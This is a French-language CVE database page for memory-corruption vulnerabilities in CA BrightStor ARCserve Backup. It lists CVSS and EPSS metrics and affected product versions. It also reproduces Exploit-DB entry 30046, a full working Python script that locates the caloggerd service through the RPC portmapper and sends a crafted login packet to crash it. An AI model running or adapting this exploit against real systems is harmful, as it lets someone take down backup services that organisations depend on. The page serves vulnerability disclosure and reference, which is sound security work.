Notifications pour un CVE
Restez informé de toutes modifications pour un CVE spécifique.
Descriptions du CVE
Multiple unspecified vulnerabilities in (1) mediasvr and (2) caloggerd in CA BrightStor ARCServe BackUp v9.01 through R11.5, and Enterprise Backup r10.5, have unknown impact and attack vectors related to memory corruption.
Informations du CVE
Faiblesses connexes
| Nom de la faiblesse | Source | |
|---|---|---|
| Category : Resource Management Errors Weaknesses in this category are related to improper management of system resources. |
Métriques
| Métriques | Score | Gravité | CVSS Vecteur | Source |
|---|---|---|---|---|
| V2 | 10 | AV:N/AC:L/Au:N/C:C/I:C/A:C | nvd@nist.gov |
EPSS
EPSS est un modèle de notation qui prédit la probabilité qu'une vulnérabilité soit exploitée.
Score EPSS
Le modèle EPSS produit un score de probabilité compris entre 0 et 1 (0 et 100 %). Plus la note est élevée, plus la probabilité qu'une vulnérabilité soit exploitée est grande.
Percentile EPSS
Le percentile est utilisé pour classer les CVE en fonction de leur score EPSS. Par exemple, une CVE dans le 95e percentile selon son score EPSS est plus susceptible d'être exploitée que 95 % des autres CVE. Ainsi, le percentile sert à comparer le score EPSS d'une CVE par rapport à d'autres CVE.
Informations sur l'Exploit
Exploit Database EDB-ID : 30046
Date de publication : 2007-05-15 22h00 +00:00
Auteur : M. Shirk
EDB Vérifié : Yes
source: https://www.securityfocus.com/bid/24017/info
Computer Associates BrightStor ARCserve Backup is prone to multiple denial-of-service vulnerabilities due to memory-corruption issues caused by errors in processing arguments passed to RPC procedures.
A remote attacker may exploit these issues to crash the affected services, resulting in denial-of-service conditions.
The following applications are affected:
BrightStor ARCserve Backup v9.01, r11.1, r11.5, r11 for Windows
BrightStor Enterprise Backup r10.5
CA Server Protection Suite r2,
CA Business Protection Suite r2
CA Business Protection Suite for Microsoft Small Business Server Standard Edition r2
CA Business Protection Suite for Microsoft Small Business Server Premium Edition r2
#!/usr/bin/python
#
# Computer Associates (CA) Brightstor Backup caloggderd.exe DoS
(camt70.dll)
# (Previously Unknown)
#
# There is an issue in camt70.dll when caloggerd is processing a
hostname for a login operation.
# When processing the string, if a null is passed in as an argument, it
will be loaded into ESI
# and then loaded into EDI in which the string processing will read a
null memory location.
#
# .text:0032ADD0 push ecx
# .text:0032ADD1 mov eax, [esp+4+arg_4]
# .text:0032ADD5 push esi
# .text:0032ADD6 mov esi, [esp+8+arg_8] <--null gets loaded
# .text:0032ADDA push edi
# .text:0032ADDB mov edx, [eax]
# .text:0032ADDD mov edi, esi <-- EDI gets set to nulls
# .text:0032ADDF or ecx, 0FFFFFFFFh
# .text:0032ADE2 xor eax, eax
# .text:0032ADE4 repne scasb
#
# This was tested on BrightStor ARCserve Backup 11.5.2.0 (SP2) with the
latest
# CA patches on Windows XP SP2
#
# CA has been notified
#
# Author: M. Shirk
#
# (c) Copyright 2007 (Shirkdog Security) shirkdog_list $ at % hotmail
dot com
#
# Use at your own Risk: You have been warned
#------------------------------------------------------------------------
import os
import sys
import time
import socket
import struct
#------------------------------------------------------------------------
# RPC GetPort request for caloggerd
rpc_portmap_req="\x80\x00\x00\x38\x21\x84\xf7\xc9\x00\x00\x00\x00\x00\x00\x00\x02\x00\x01\x86\xa0\x00\x00\x00\x02\x00\x00\x00\x03\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06\x09\x82\x00\x00\x00\x01\x00\x00\x00\x06\x00\x00\x00\x00"
# Begining of RPC Packet
packet="\x80\x00\x00\x58\x31\x46\xD3\xB9\x00\x00\x00\x00\x00\x00\x00\x02"
# Prog ID (caloggerd)
packet+="\x00\x06\x09\x82"
# Operation number 1
packet+="\x00\x00\x00\x01\x00\x00\x00\x01"
# Nulls
packet+="\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
# Size of hostname, used in the Login
packet+="\x00\x00\x00\x22"
# Hostname, which apparently with the size and the nulls, causes the DoS
packet+="\x41\x41\x41\x41"*8
packet+="\x41\x41\x00\x00"
packet+="\xff\xff\xff\xff"
#------------------------------------------------------------------------
def GetCALoggerPort(target):
sock = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
sock.connect((target,111))
sock.send(rpc_portmap_req)
rec = sock.recv(256)
sock.close()
port1 = rec[-4]
port2 = rec[-3]
port3 = rec[-2]
port4 = rec[-1]
port1 = hex(ord(port1))
port2 = hex(ord(port2))
port3 = hex(ord(port3))
port4 = hex(ord(port4))
port = '%02x%02x%02x%02x' %
(int(port1,16),int(port2,16),int(port3,16),int(port4,16))
port = int(port,16)
print '[+] Sending TCP Packet of Death to Target: %s Port: %s' %
(target,port)
ExploitCALoggerd(target,port)
def ExploitCALoggerd(target,port):
sock = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
sock.connect((target,port))
sock.send(packet)
sock.close()
print '[+] Done...\n[+] caloggerd.exe is dead\n[+] ... or it
will die in a few seconds for you inpatient bastards\n'
if __name__=="__main__":
try:
target = sys.argv[1]
except IndexError:
print '[+] Computer Associates (CA) Brightstor Backup
caloggerd.exe DoS (camt70.dll)'
print '[+] Author: Shirkdog'
print '[+] Usage: %s <target ip>\n' % sys.argv[0]
sys.exit(-1)
print '[+] Computer Associates (CA) Brightstor Backup
caloggerd.exe DoS (camt70.dll)'
print '[+] Author: Shirkdog'
GetCALoggerPort(target)
Products Mentioned
Configuraton 0
Broadcom>>Brightstor_arcserve_backup >> Version 9.01
- Broadcom>>Brightstor_arcserve_backup >> Version 9.01 (Open CPE detail)
Broadcom>>Brightstor_arcserve_backup >> Version 10.5
- Broadcom>>Brightstor_arcserve_backup >> Version 10.5 (Open CPE detail)
Broadcom>>Brightstor_arcserve_backup >> Version 11
- Broadcom>>Brightstor_arcserve_backup >> Version 11 (Open CPE detail)
Broadcom>>Brightstor_arcserve_backup >> Version 11.1
- Broadcom>>Brightstor_arcserve_backup >> Version 11.1 (Open CPE detail)
- Broadcom>>Brightstor_arcserve_backup >> Version 11.1 (Open CPE detail)
- Broadcom>>Brightstor_arcserve_backup >> Version 11.1 (Open CPE detail)
- Broadcom>>Brightstor_arcserve_backup >> Version 11.1 (Open CPE detail)
- Broadcom>>Brightstor_arcserve_backup >> Version 11.1 (Open CPE detail)
- Broadcom>>Brightstor_arcserve_backup >> Version 11.1 (Open CPE detail)
- Broadcom>>Brightstor_arcserve_backup >> Version 11.1 (Open CPE detail)
- Broadcom>>Brightstor_arcserve_backup >> Version 11.1 (Open CPE detail)
Broadcom>>Brightstor_arcserve_backup >> Version 11.5
- Broadcom>>Brightstor_arcserve_backup >> Version 11.5 (Open CPE detail)
- Broadcom>>Brightstor_arcserve_backup >> Version 11.5 (Open CPE detail)
- Broadcom>>Brightstor_arcserve_backup >> Version 11.5 (Open CPE detail)
Broadcom>>Brightstor_enterprise_backup >> Version 10.5
- Broadcom>>Brightstor_enterprise_backup >> Version 10.5 (Open CPE detail)
- Broadcom>>Brightstor_enterprise_backup >> Version 10.5 (Open CPE detail)
- Broadcom>>Brightstor_enterprise_backup >> Version 10.5 (Open CPE detail)
- Broadcom>>Brightstor_enterprise_backup >> Version 10.5 (Open CPE detail)
- Broadcom>>Brightstor_enterprise_backup >> Version 10.5 (Open CPE detail)
- Broadcom>>Brightstor_enterprise_backup >> Version 10.5 (Open CPE detail)
Références
http://www.securityfocus.com/archive/1/482121/100/0/threaded
Tags : mailing-list, x_refsource_BUGTRAQ
Tags : mailing-list, x_refsource_BUGTRAQ
